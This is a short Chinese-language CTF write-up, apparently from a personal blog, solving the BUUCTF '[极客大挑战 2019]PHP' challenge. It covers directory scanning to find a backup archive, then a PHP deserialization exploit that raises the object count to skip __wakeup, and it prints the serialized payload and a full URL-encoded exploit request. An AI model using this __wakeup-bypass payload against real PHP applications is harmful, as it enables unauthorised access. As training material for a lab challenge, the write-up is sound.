【BUUCTF】[极客大挑战 2019]PHP
[TOC]
[极客大挑战 2019]PHP
打开网页是一个很可爱的小猫咪,提到了备份网站
在linux中使用disearch.py进行目录扫描。
搜索到了www.zip
下载解压,查看目录结构:
分析class.php:
|
执行destruct()魔术方法时,必须同时满足
username === admin password = 100 |
才可以得到flag.
但是出现了wqakeup()方法使得username会变成guest,因此采用序列化字符串中对象的个数来绕过该方法。
EXP:
|
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";} |
输入时记得将Name后面的2改为3或其他
payload:http://33654565-450c-413d-b2bb-9d81273d6252.node4.buuoj.cn:81/index.php/?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The DC_comics's World!